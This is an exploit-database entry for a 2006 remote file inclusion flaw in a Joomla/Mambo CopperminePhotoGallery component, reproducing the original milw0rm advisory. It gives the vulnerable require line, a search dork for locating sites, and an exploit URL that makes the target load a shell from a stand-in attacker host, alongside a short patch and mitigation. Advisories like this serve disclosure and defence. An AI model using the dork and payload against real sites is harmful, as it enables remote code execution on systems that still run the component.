header-logo
Suggest Exploit
vendor:
CopperminePhotoGallery Component
by:
k1tk4t
7,5
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: CopperminePhotoGallery Component
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

CopperminePhotoGallery Component

This bug allows a remote attacker to execute commands via RFI. The bug is present in the cpg.php file, which is vulnerable to RFI due to the presence of the line 'require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");'. The exploit can be triggered by using a dork 'inurl:com_cpg' and sending a malicious HTTP request to the vulnerable URL 'htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=http://evil.xxx/shell.txt?'

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in any application logic.
Source

Exploit-DB raw data:

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google

# milw0rm.com [2006-08-16]

Navigation

Suggest Exploit

Services By CQR